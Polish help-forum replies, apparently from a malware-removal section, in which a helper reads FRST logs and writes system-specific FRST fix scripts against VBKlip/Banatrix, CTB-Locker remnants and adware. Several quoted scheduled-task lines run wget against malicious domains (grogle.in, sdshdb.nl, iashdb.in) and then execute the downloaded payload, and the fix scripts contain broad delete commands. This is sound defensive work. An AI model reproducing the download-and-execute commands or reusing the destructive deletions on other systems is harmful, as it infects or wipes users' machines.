picasso

Reprofiler tylko pomaga przekierować konto na poprzednią ścieżkę (wykonując bazowy reset ACL), ale nie naprawia innych usterek źródłowych, które doprowadziły do odrzucenia konta, np. rejestr lub któryś subfolder konta może być po prostu uszkodzony. Uszkodzone elementy nie zostaną załadowane. W pierwszym FRST Addition jest komplet danych, tzn. określone błędy z Dziennika zdarzeń sugerujące, że przekierowanie Reprofiler może być nieskuteczne: 1. Przyczyna odrzucenia konta: Error: (02/06/2015 02:45:32 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1508) (User: ZARZĄDZANIE NT) Description: System Windows nie może załadować rejestru. Częstą przyczyną tego problemu jest za mała ilość pamięci lub brak wystarczających praw zabezpieczeń. SZCZEGÓŁY - Operacja We/Wy zainicjowana przez rejestr nie powiodła się w sposób nieodwracalny. Rejestr nie może wczytać, wypisać lub opróżnić jednego z plików zawierających obraz rejestru systemu. for C:\Users\Stach\ntuser.dat Reprofiler przywrócił wprawdzie poprzednią ścieżkę, ale i tak konto nie jest sprawne. Konto na ubój, tzn. należy założyć nowe i ze starej ścieżki przekopiować tylko istotne dane. Ale: 2. Źródło problemu to bad sektory dysku: System errors: ============= Error: (02/06/2015 03:05:57 PM) (Source: Disk) (EventID: 7) (User: ) Description: W urządzeniu \Device\Harddisk0\DR0 wystąpił zły blok. Temat przenoszę do działu Hardware na diagnostykę. Dostarcz informacje wymagane działem: KLIK. Od razu zabezpiecz cenne dane na nośniku zewnętrznym.

Infekcja jest czynna, uruchamia się za pomocą Harmonogramu zadań plik z katalogu tymczasowego. Pierwsza faza to będzie usunięcie infekcji. Druga faza to wyrzucenie zaszyfrowanych plików. Działania wstępne: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: Task: C:\WINDOWS\Tasks\At1.job => C:\DOCUME~1\irena\DANEAP~1\FoxTab\UPDATE~1\UPDATE~1.EXE Task: C:\WINDOWS\Tasks\cxoqoka.job => C:\DOCUME~1\irena\USTAWI~1\Temp\geydprm.exe HKLM\...\Run: [ConvertAd] => C:\Documents and Settings\irena\Ustawienia lokalne\Dane aplikacji\ConvertAd\ConvertAd.exe HKLM\...\Run: [mobilegeni daemon] => C:\Program Files\Mobogenie\DaemonProcess.exe C:\Documents and Settings\All Users\Menu Start\Programy\Avira\AntiVir Desktop\Display readme.lnk C:\Documents and Settings\All Users\Dane aplikacji\vkdvkyc.html C:\Documents and Settings\irena\Moje dokumenty\!Decrypt-All-Files-scqwxua.bmp C:\Documents and Settings\irena\Moje dokumenty\!Decrypt-All-Files-scqwxua.txt C:\Program Files\mozilla firefox\plugins Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ConvertAd /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Tapeta jest podstawiona plikiem infekcji: ==================== Other Registry Areas ===================== HKU\S-1-5-21-746137067-261478967-682003330-1003\Control Panel\Desktop\\Wallpaper -> C:\Documents and Settings\irena\Moje dokumenty\!Decrypt-All-Files-scqwxua.bmp W skrypcie usuwam plik tapety, to spowoduje pojawienie się pustego ekranu. Należy ręcznie zmienić tapetę wskazując jakiś plik, który nie został zaszyfrowany. 3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt.

Dla poprzedniego komputera: oczywiście czekam na fixlog z ostatniej akcji, a po sprawdzeniu podam końcowe kroki. Drugi komputer: ta sama infekcja, tylko mniej zadań w Harmonogramie. Akcje do przeprowadzenia: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {2B0FCD48-6531-4E36-89FA-214F118F1445} - System32\Tasks\{F11B7F52-71B1-40A5-B2D0-7E2A96AD8C9E} => pcalua.exe -a C:\Users\Proteus\Downloads\Huawei_Drivers_v4.25.11.00\Driver\DriverSetup.exe -d C:\Users\Proteus\Downloads\Huawei_Drivers_v4.25.11.00\Driver Task: {8C97B981-9056-421B-A12D-7C43087905C6} - System32\Tasks\{07CD315F-8D34-4281-AC9E-4CEFE4534D41} => pcalua.exe -a "C:\Program Files (x86)\PLAY ONLINE\uninst.exe" Task: {8F39E590-088F-4A09-95CC-41AD1FDCBEC1} - System32\Tasks\{61BD271E-EF2E-4AC1-8FD9-3097ABF7B4DA} => pcalua.exe -a "C:\Program Files\AVAST Software\Avast\aswRunDll.exe" -c "C:\Program Files\AVAST Software\Avast\Setup\setiface.dll" RunSetup Task: {BA832787-7A2E-46E3-8854-CB91F631F134} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=embX3iyw8R;camtasia.exe;1422474927 & start cmd /R dat.bmp Task: {C99679AE-306B-4F01-927D-DA1BFF564E10} - System32\Tasks\{2C909A96-50CC-46F5-AA7E-7AD6831ED2EC} => pcalua.exe -a C:\ProgramData\LGMOBILEAX\LGMLauncher.exe -d C:\ProgramData\LGMOBILEAX CustomCLSID: HKU\S-1-5-21-2603393732-3475753062-4034012456-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll No File HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\...\Run: [Akamai NetSession Interface] => "C:\Users\Proteus\AppData\Local\Akamai\netsession_win.exe" ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie SearchScopes: HKU\S-1-5-21-2603393732-3475753062-4034012456-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={sear SearchScopes: HKU\S-1-5-21-2603393732-3475753062-4034012456-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = FF HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\...\Firefox\Extensions: [{B64D9B05-48E1-4CEB-BF58-E0643994E900}] - C:\Program Files (x86)\Common Files\DVDVideoSoft\plugins\ff CHR DefaultSuggestURL: Default -> http://ssmsp.ask.com/query?sstype=prefix&li=ff&q={searchTerms} S3 cpuz130; \??\C:\Users\Proteus\AppData\Local\Temp\cpuz130\cpuz_x64.sys [X] S3 cpuz137; \??\C:\Windows\TEMP\cpuz137\cpuz137_x64.sys [X] S3 ew_hwusbdev; system32\DRIVERS\ew_hwusbdev.sys [X] S3 ew_usbenumfilter; system32\DRIVERS\ew_usbenumfilter.sys [X] S3 GPUZ; \??\C:\Windows\TEMP\GPUZ.sys [X] S3 huawei_cdcacm; system32\DRIVERS\ew_jucdcacm.sys [X] S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X] S3 huawei_ext_ctrl; system32\DRIVERS\ew_juextctrl.sys [X] S3 huawei_wwanecm; system32\DRIVERS\ew_juwwanecm.sys [X] S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X] C:\Program Files (x86)\GUT73DA.tmp C:\ProgramData\TEMP C:\Users\Proteus\Downloads\M-Kernel_*.zip C:\Users\Proteus\Downloads\sh-remover.exe CMD: del /q C:\ProgramData\*.* Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. 3. Zrób nowy log FRST z opcji Scan, zaznacz Addition, ale nie Shortcut. Dołącz też plik fixlog.txt.

Delfix wykonał zadanie, możesz skasować z dysku plik C:\Delfix.txt. Chodzi o odinstalowanie przez Panel sterowania starych wersji Java 7 Update 45 + Java 7 Update 51 (64-bit) . Następnie (o ile Java w ogóle potrzebna), instalujesz z linka podanego w przyklejonym odpowiednią najnowszą wersję.

Na temat używania ComboFix: KLIK. Log wynikowy już zostaw, by było wiadome co mieszał. Jego uruchomienie było zupełnie niepotrzebne. Dostosuj się do zasad działu i dostarcz obowiązkowe logi FRST + GMER: KLIK.

Nie prosiłam o nowe logi FRST (usuwam), na tym etapie tylko fixlog mi był potrzebny. Jeśli nie wymieniam konkretnej akcji, to znaczy że nie jest potrzebna. Ostatnia poprawka na szczątki Google Chrome development ciągle walające się w rejestrze. Otwórz Notatnik i wklej w nim: Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D} /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96} /f Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Pokaż wynikowy fixlog.txt.

Opcje "Drivers MD5" i "List BCD" nie miały być zaznaczone dio skanu FRST. Fixy wykonane. Idziemy dalej: Uruchom AdwCleaner. Na początek wybierz tylko opcję Szukaj (nie stosuj jeszcze Usuń) i dostarcz log z folderu C:\AdwCleaner. Chodzi o najnowszą wersję AdwCleaner podaną w przyklejonym, w logu FRST są ślady używania jakiejś archaicznej, która umieszczała pliki raportów luzem w root dysku.

Aj, w międzyczasie próbowałeś YAC (Yet Another Cleaner) - to podejrzany wątpliwy skaner: KLIK. Kolejne poprawki: Otwórz Notatnik i wklej w nim: S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\NPE RemoveDirectory: C:\Users\Proteus\AppData\Local\NPE RemoveDirectory: C:\Users\Proteus\Desktop\Stare dane programu Firefox RemoveDirectory: C:\Windows\system32\log CMD: del /q C:\ProgramData\*.* CMD: del /q C:\Users\Proteus\Downloads\yet_another_cleaner_sk_6111391.exe Reg: reg query HKLM\SOFTWARE\Google\Update\ClientState /s Reg: reg query HKLM\SOFTWARE\Wow6432Node\Google\Update\ClientState /s Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Pokaż wynikowy fixlog.txt. Gdy skończymy z tym komputerem, podasz pełny zestaw logów z tego drugiego.

Co z usuwaniem kwarantanny FRST? Gdy to się uda, zastosuj jeszcze DelFix i wyczyść foldery Przywracania systemu: KLIK.

Dodatkowe kroki: 1. Zastosuj DelFix. 2. Sugeruję odinstalować zbędnik AVG Web TuneUp (to taki firmowy "PUP"). Po tym w Google Chrome zweryfikuj czy wszystkie przekierowania mysearch.avg.com ustąpiły z wyszukiwarki i stron startowych. 3. Na wszelki wypadek zrób jeszcze dodatkowe skany za pomocą: ESET Online Scanner, Hitman Pro, Malwarebytes Anti-Malware. Jeśli coś znajdą, dostarcz raporty.

Temat przenoszę do działu Windows. To nie jest problem infekcji. Używałeś ComboFix, niepotrzebnie. Ogólnie na ten temat: KLIK. 1. Są w Dzienniku zdarzeń błędy opowiadające o opóźnieniu odpowiedzi z kontrolera dysku: Error: (02/05/2015 08:21:08 AM) (Source: iaStor) (EventID: 9) (User: ) Description: Urządzenie \Device\Ide\iaStor0 nie odpowiedziało w ramach ustalonego limitu czasu. To może być problem z obniżeniem transferu dysku z DMA do PIO. Na wszelki wypadek sprawdź wątek Skutki uboczne skanu GMER (dyski w trybie IDE, głównie system XP): KLIK. 2. Możliwości zamulenia na poziomie software to np. Avast, mówisz że jest zdefektowany. To stara wersja 9.0.2021 (aktualna to 2015.10.0.2208). Odinstaluj program całkowicie i sprawdź czy są jakieś zmiany. 3. Może tu być także problem czysto sprzętowy, np. problem z dyskiem twardym. Diagnostyka pod tym kątem: KLIK. Konto hoshi jest uszkodzone, system nie jest w stanie załadować gałęzi klas rejestru: Application errors: ================== Error: (02/05/2015 10:30:16 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1542) (User: ZARZĄDZANIE NT) Description: System Windows nie może załadować pliku rejestru klas. SZCZEGÓŁY — Nie można odnaleźć określonego pliku. Załóż nowe konto, a ze starego potem przekopiujesz dane. Dziennik zdarzeń sugeruje, że powiązana usługa jest po prostu wyłączona: System errors: ============= Error: (02/05/2015 10:22:23 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Kopiowanie woluminów w tle z powodu następującego błędu: %%1053 Error: (02/05/2015 10:22:23 AM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Kopiowanie woluminów w tle. Start > w polu szukania wpisz services.msc > z prawokliku Uruchom jako Administrator> dwuklik w usługę Kopiowanie woluminów w tle i Typ uruchomienia ustaw na Ręczny. Jakie konkretnie problemy? W Dzienniku są wprawdzie błędy usługi Avast, ale błędy sugerują wyłączoną usługę, log FRST tego nie potwierdza (wszystkie obiekty Avast na chodzie). System errors: ============= Error: (02/05/2015 08:25:51 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi avast! Antivirus z powodu następującego błędu: %%1053 Error: (02/05/2015 08:25:51 AM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą avast! Antivirus. PS. Gdy już się uporasz z powyższymi, doczyść sobie śmieciarskie wpisy (nie związane z kontem hoshi). W spoilerze instrukcja. To nie ma żadnego związku z powyższym problemem.

Ten odczyt z Wallpaper w Addition to chyba jakieś zaburzenia FRST. Nawiasem mówiąc, tam było od początku JPG w ścieżce, to jest ścieżka w rejestrze a nie na dysku. Ścieżka na dysku była w pliku Search. Wszystko wykonane. Dotychczas było usuwanie zaszyfrowanych kopii z dysku C (funkcja Search FRST jest ograniczona tylko do systemowego). Jest tu jednak też partycja D. Co na niej jest (czy typ danych obejmowanych szyfrowaniem CTB-Locker), czy tam też są zaszyfrowane wtręty? Potwierdź, a wtedy będziesz mógł wykonać kolejny fixlist.txt do FRST o zawartości: CMD: rd /s /q D:\$Recycle.Bin CMD: del /q /s D:\*pogkqql*

AdwCleaner tu nie pomoże, to nie jest adware. To jest infekcja typu VBKlip/Banatrix ładowana za pomocą Harmonogramu zadań: Task: {49ACE010-577E-4A92-BC37-A396BD06DD3C} - System32\Tasks\SYSTEMDOWN => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://sdshdb.nl/index.php?data=XhyuslHf2k;up;1421852599 & start cmd /R dat.bmp Task: {52BD9ED5-BE48-4C77-B61E-69F2B29FA155} - System32\Tasks\SYSTEMUP => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://iashdb.in/index.php?data=iUbbj8phSd;up;1421852589 & start cmd /R dat.bmp Task: {7DCC40B8-FC2C-4903-8585-D5A44E56A190} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=9a9CS535Ou;camtasia.exe;1421836212 & start cmd /R dat.bmp Ale są tu też konsekwencje pobytu adware. Adware nadal jest obecne w różnych miejscach (np. aplikacja "Grammarly Lite Smart Spellchecker"). Ponadto, cała przeglądarka Google Chrome została przekonwertowana przez adware z wersji stabilnej do developerskiej i jest wymagana jej reinstalacja. Wdróż następujące działania: 1. Przez Panel sterowania odinstaluj adware, poszkodowaną przeglądarkę i stare wersje: Adobe Reader X (10.1.9) , Adobe Shockwave Player 12.0, Grammarly Lite Smart Spellchecker, Google Chrome, Java 7 Update 17. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {49ACE010-577E-4A92-BC37-A396BD06DD3C} - System32\Tasks\SYSTEMDOWN => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://sdshdb.nl/index.php?data=XhyuslHf2k;up;1421852599 & start cmd /R dat.bmp Task: {52BD9ED5-BE48-4C77-B61E-69F2B29FA155} - System32\Tasks\SYSTEMUP => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://iashdb.in/index.php?data=iUbbj8phSd;up;1421852589 & start cmd /R dat.bmp Task: {7A0BED88-1594-4021-8842-72AD25A9A43B} - System32\Tasks\{1C57B201-D7B9-445A-90ED-7F1E2614E4A6} => pcalua.exe -a C:\Users\Proteus\AppData\Roaming\awesomehp\UninstallManager.exe Task: {7DCC40B8-FC2C-4903-8585-D5A44E56A190} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=9a9CS535Ou;camtasia.exe;1421836212 & start cmd /R dat.bmp Task: {70055F6B-23A1-442B-86EC-6D69DFADECC6} - System32\Tasks\EasyPartitionManager => C:\Windows\MSetup\BA46-12225A02\EPM.exe Startup: C:\Users\Proteus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M-Kernel_a69.zip.lnk S3 cpuz130; \??\C:\Users\Proteus\AppData\Local\Temp\cpuz130\cpuz_x64.sys [X] S3 cpuz135; \??\C:\windows\TEMP\cpuz135\cpuz135_x64.sys [X] HKLM-x32\...\Run: [fst_pl_81] => [X] HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [Andy] => C:\Program Files\Andy\HandyAndy.exe HKLM\...\Policies\Explorer: [NoControlPanel] 0 HKU\S-1-5-21-1866740971-3537411966-2138577161-1001\...\Run: [] => [X] ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp220141121 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKU\S-1-5-21-1866740971-3537411966-2138577161-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=en&pid=NIS&pvid=21.5.0.19 HKU\S-1-5-21-1866740971-3537411966-2138577161-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie SearchScopes: HKU\S-1-5-21-1866740971-3537411966-2138577161-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={sear FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.) FF Plugin HKU\S-1-5-21-1866740971-3537411966-2138577161-1001: @tools.google.com/Google Update;version=3 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.) FF Plugin HKU\S-1-5-21-1866740971-3537411966-2138577161-1001: @tools.google.com/Google Update;version=9 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.) CustomCLSID: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File C:\ProgramData\*.* C:\ProgramData\{1b30cb05-82b9-9e5a-1b30-0cb0582b2c16} C:\ProgramData\{d0a5e402-7f84-7b8f-d0a5-5e4027f89009} C:\ProgramData\{d0a5e402-7f84-7b8f-d0a5-5e4027f89009} C:\ProgramData\Temp C:\Users\Proteus\AppData\Local\Google\Chrome C:\Users\Proteus\Desktop\FOLDERY\PROGRAMY\Samsung Kies.lnk C:\Users\Proteus\Downloads\*(*)-dp*.exe C:\windows\SysWOW64\AMD64 C:\windows\SysWOW64\X86 Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKCU\Software\Google\Chrome /f Reg: reg delete HKLM\SOFTWARE\Google\Chrome /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google\Chrome /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f CMD: sc config "PLAY ONLINE. RunOuc" start= disabled EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale używane rozszerzenia trzeba będzie przeinstalować. 4. Napraw uszkodzony specjalny skrót IE. W pasku adresów eksploratora wklej ścieżkę i ENTER: C:\Users\Proteus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 5. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt.

Usunąłeś poprawne niewybrakowane wpisy: ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Jarek\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll (Dropbox, Inc.) BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation) BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated) R2 DCService.exe; C:\ProgramData\DatacardService\DCService.exe [229376 2010-08-19] () [File not signed] R2 UI Assistant Service; C:\Program Files (x86)\PLAY ONLINE\AssistantServices.exe [260976 2011-05-31] () S3 TVICHW32; C:\Windows\system32\DRIVERS\TVICHW32.SYS [21200 2013-11-25] (EnTech Taiwan) S3 TVICHW32; C:\Windows\SysWOW64\DRIVERS\TVICHW32.SYS [29536 2013-11-25] (EnTech Taiwan) Niektóre szkody nieistotne (będzie i tak deinstalacja określonych rzeczy), Dropboxa przeinstalujesz, usunięte usługi zaś będą rekonstruowane z kopii zapasowej FRST. Dodatkowa uwaga: skoro usuwasz w całości klucze MozillaPlugins, to nie ma sensu przetwarzać wpisów typu "FF Plugin" kierujących w to miejsce, bo i tak zostaną usunięte. Próbowałeś też przetwarzać poprawne adresy DNS UPC. To się i tak nie wykonało, bo nie jest sensowne. To wartość dynamiczna pobierana z routera, nie da się jej zmodyfikować na stałe z poziomu Windows, i tak będzie przywracana z routera: Tcpip\Parameters: [DhcpNameServer] 62.179.1.62 62.179.1.63 W mojej mocy są tylko poprawki, zaszyfrowanych danych niestety nie ma jak odzyskać. Do usunięcia będą szczątki adware i programów, artefakty wstawione przez ComboFix (np. martwa usługa AppMgmt nie występująca na edycjach Home), pliki pomocnicze CTB-Locker oraz zaszyfrowane dane (to krok na potem). 1. Deinstalacje: - Przez Panel sterowania odinstaluj stare wersje Adobe Reader X MUI, Adobe Shockwave Player 12.0, Java™ 7 Update 1 (64-bit), Java™ 7 Update 1 oraz zbędnik przypuszczanie instalowany nieintencjonalnie Smart File Advisor. - Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście po kolei odpadkowe wpisy Update Installer for WildTangent Games App, WildTangent Games App > Dalej. - Start > w polu szukania wklep devmgmt.msc > z prawokliku Uruchom jako Administrator. Wyszukaj pozycję avast! Firewall NDIS Filter Miniport, odinstaluj i zresetuj system. 2. Otwórz Notatnik i wklej w nim: U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) R1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [45856 2013-08-22] (AVG Technologies) S4 GamesAppService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe" [X] CHR HKLM\SOFTWARE\Policies\Google: Policy restriction CHR HKU\S-1-5-21-2876413115-476791588-3789803701-1000\SOFTWARE\Policies\Google: Policy restriction HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction Task: {24504EEB-9805-4081-99F6-9FAC96018FD3} - System32\Tasks\{363F7A12-B195-4882-A45E-0177088DD5F1} => pcalua.exe -a D:\blueconnect\Setup.exe -d D:\blueconnect Task: {E9D2EEFD-3FF2-43C5-8865-E7A6D874A797} - System32\Tasks\Go for FilesUpdate => C:\Program Files (x86)\GoforFiles\GFFUpdater.exe Task: {F2AA8173-817D-403D-BCE2-9ACBB457BB58} - \AdobeFlashPlayerUpdate No Task File Task: {F560B843-4495-47C1-955B-F47D5339CA85} - \AdobeFlashPlayerUpdate 2 No Task File Task: {FC035E5E-4222-49D5-83C0-ABC03029922C} - \dpcewba No Task File HKU\S-1-5-21-2876413115-476791588-3789803701-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch C:\Program Files\Enigma Software Group C:\Program Files\Google C:\Program Files\Java C:\Program Files (x86)\Common Files\Java C:\Program Files (x86)\Common Files\McAfee C:\Program Files (x86)\IsaVeer C:\Program Files (x86)\Java C:\Program Files (x86)\Mozilla Firefox C:\Program Files (x86)\Temp C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69 C:\ProgramData\3872871776 C:\ProgramData\50Cuoupons C:\ProgramData\7875723679439a5a C:\ProgramData\8679969435114773082 C:\ProgramData\AnySend C:\ProgramData\AVAST Software C:\ProgramData\c406ba16000042c6 C:\ProgramData\DeEaalExpress C:\ProgramData\EEnjooYCouppon C:\ProgramData\Evernote C:\ProgramData\InstallMate C:\ProgramData\iolo C:\ProgramData\McAfee C:\ProgramData\Mini - Adblocker C:\ProgramData\Sun C:\ProgramData\The AdBlocker C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Player Classic - Home Cinema\Changelog.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VAIO 